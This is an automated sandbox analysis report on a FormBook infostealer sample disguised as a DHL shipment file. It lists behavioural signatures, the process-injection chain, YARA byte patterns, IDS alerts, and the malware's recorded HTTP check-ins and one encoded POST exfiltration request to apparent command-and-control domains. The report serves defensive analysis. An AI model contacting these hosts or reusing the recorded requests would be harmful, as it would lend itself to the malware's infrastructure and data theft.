Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL 806-232024.exe

Overview

General Information

Sample name:DHL 806-232024.exe
Analysis ID:1580265
MD5:a32e770c62bab92fb9f5413a70a62836
SHA1:46578409fab1fbe2a943bf685f672334643332ed
SHA256:00157cae4f7d3b063ab95dcfd1ec233bb79a0fd54a18558fd104ca4599c38874
Tags:DHLexeFormbookuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DHL 806-232024.exe (PID: 5168 cmdline: "C:\Users\user\Desktop\DHL 806-232024.exe" MD5: A32E770C62BAB92FB9F5413A70A62836)
    • svchost.exe (PID: 5280 cmdline: "C:\Users\user\Desktop\DHL 806-232024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • yAEEhNGBaPExAdMu.exe (PID: 4416 cmdline: "C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 1200 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • yAEEhNGBaPExAdMu.exe (PID: 3440 cmdline: "C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7080 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.320000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.320000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.320000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.320000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL 806-232024.exe", CommandLine: "C:\Users\user\Desktop\DHL 806-232024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 806-232024.exe", ParentImage: C:\Users\user\Desktop\DHL 806-232024.exe, ParentProcessId: 5168, ParentProcessName: DHL 806-232024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 806-232024.exe", ProcessId: 5280, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\DHL 806-232024.exe", CommandLine: "C:\Users\user\Desktop\DHL 806-232024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 806-232024.exe", ParentImage: C:\Users\user\Desktop\DHL 806-232024.exe, ParentProcessId: 5168, ParentProcessName: DHL 806-232024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 806-232024.exe", ProcessId: 5280, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T08:23:35.385717+010020507451Malware Command and Control Activity Detected192.168.2.549732154.215.72.11080TCP
            2024-12-24T08:24:09.428113+010020507451Malware Command and Control Activity Detected192.168.2.549812116.50.37.24480TCP
            2024-12-24T08:25:32.858936+010020507451Malware Command and Control Activity Detected192.168.2.54986785.159.66.9380TCP
            2024-12-24T08:25:47.642095+010020507451Malware Command and Control Activity Detected192.168.2.54999091.195.240.9480TCP
            2024-12-24T08:26:11.200375+010020507451Malware Command and Control Activity Detected192.168.2.54999466.29.149.4680TCP
            2024-12-24T08:26:26.330372+010020507451Malware Command and Control Activity Detected192.168.2.549998195.110.124.13380TCP
            2024-12-24T08:26:57.688067+010020507451Malware Command and Control Activity Detected192.168.2.550002217.196.55.20280TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://www.elettrosistemista.zip/fo8o/?SFst=D27DuB&UzG=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==Avira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/?UzG=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&SFst=D27DuBAvira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?SFst=D27DuB&UzG=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==Avira URL Cloud: Label: malware
            Source: http://www.techchains.info/fo8o/Avira URL Cloud: Label: malware
            Source: DHL 806-232024.exeVirustotal: Detection: 29%Perma Link
            Source: DHL 806-232024.exeReversingLabs: Detection: 44%
            Source: Yara matchFile source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: DHL 806-232024.exeJoe Sandbox ML: detected
            Source: DHL 806-232024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yAEEhNGBaPExAdMu.exe, 00000003.00000002.4529766745.00000000004DE000.00000002.00000001.01000000.00000004.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4529866987.00000000004DE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 806-232024.exe, 00000000.00000003.2062085946.0000000003930000.00000004.00001000.00020000.00000000.sdmp, DHL 806-232024.exe, 00000000.00000003.2060906795.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214449127.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115983541.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214449127.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2117729754.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530635872.00000000036A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530635872.000000000383E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2216468139.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2214245032.000000000334A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 806-232024.exe, 00000000.00000003.2062085946.0000000003930000.00000004.00001000.00020000.00000000.sdmp, DHL 806-232024.exe, 00000000.00000003.2060906795.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2214449127.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115983541.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214449127.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2117729754.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4530635872.00000000036A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530635872.000000000383E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2216468139.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2214245032.000000000334A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2181119157.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214208965.0000000002800000.00000004.00000020.00020000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530115940.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4529839998.000000000320E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530981261.0000000003CCC000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2505119370.000000002961C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4529839998.000000000320E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530981261.0000000003CCC000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2505119370.000000002961C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2181119157.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214208965.0000000002800000.00000004.00000020.00020000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530115940.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00934696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00934696
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0093C9C7
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093C93C FindFirstFileW,FindClose,0_2_0093C93C
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0093F200
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0093F35D
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0093F65E
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00933A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00933A2B
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00933D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00933D4E
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0093BF27
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DCBAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_02DCBAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_02DB9480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi4_2_02DBDD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_0358053E

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49732 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49812 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49867 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50002 -> 217.196.55.202:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49998 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49994 -> 66.29.149.46:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49990 -> 91.195.240.94:80
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
            Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_009425E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009425E2
            Source: global trafficHTTP traffic detected: GET /fo8o/?SFst=D27DuB&UzG=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?SFst=D27DuB&UzG=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?SFst=D27DuB&UzG=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?UzG=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&SFst=D27DuB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?UzG=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&SFst=D27DuB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?SFst=D27DuB&UzG=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?UzG=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&SFst=D27DuB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 204Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 55 7a 47 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d Data Ascii: UzG=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
